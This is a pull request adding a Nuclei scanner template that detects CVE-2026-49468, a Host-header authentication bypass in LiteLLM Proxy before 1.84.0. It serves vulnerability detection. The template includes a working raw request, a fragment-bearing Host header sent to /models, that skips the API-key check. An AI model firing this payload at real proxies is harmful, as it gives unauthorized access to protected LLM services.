### PR TITLE
Add CVE-2026-49468 template

### DIFF
--- a/http/cves/2026/CVE-2026-49468.yaml
+++ b/http/cves/2026/CVE-2026-49468.yaml
@@ -1,0 +1,45 @@
+id: CVE-2026-49468
+
+info:
+  name: LiteLLM Proxy < 1.84.0 - Host Header Authentication Bypass
+  author: str4k3r
+  severity: critical
+  description: |
+    LiteLLM Proxy before 1.84.0 derives its public-route authorization check
+    from a URL reconstructed with the unvalidated Host header. A Host value
+    containing a fragment can make a protected request appear to target the
+    public root route, bypassing the API-key check. Version 1.84.0 derives the
+    route from the raw ASGI path instead.
+  remediation: Upgrade LiteLLM Proxy to 1.84.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-49468
+    - https://github.com/BerriAI/litellm/security/advisories/GHSA-4xpc-pv4p-pm3w
+    - https://github.com/BerriAI/litellm/releases/tag/v1.84.0
+  classification:
+    cve-id: CVE-2026-49468
+    cwe-id: CWE-290
+    cvss-score: 8.1
+    cvss-metrics: CVSS:3.1/AV:H/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+  metadata:
+    vendor: berriai
+    product: litellm
+    technology: python,fastapi,starlette
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,litellm,authbypass,llm
+
+http:
+  - raw:
+      - |+
+        GET /models HTTP/1.1
+        Host: {{Hostname}}/#
+    unsafe: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"object":"list"'


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-49468 in LiteLLM Proxy. Before 1.84.0, the public-route check can be confused by a fragment-bearing Host header and skip authentication for the requested protected route.

## Detection

The template makes one GET request to the generic `/models` endpoint without credentials and uses the malformed Host header described by the advisory. A vulnerable proxy returns the model-list object; fixed releases reject the request at authentication.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-49468
- https://github.com/BerriAI/litellm/security/advisories/GHSA-4xpc-pv4p-pm3w
- https://github.com/BerriAI/litellm/releases/tag/v1.84.0

## Validation

Previously recorded native Nuclei v3.11.0 differential: vulnerable 1.83.14-stable.patch.3 detected 3/3; fixed 1.84.0 not detected 3/3. The final template was syntax-validated and quality-checked before submission.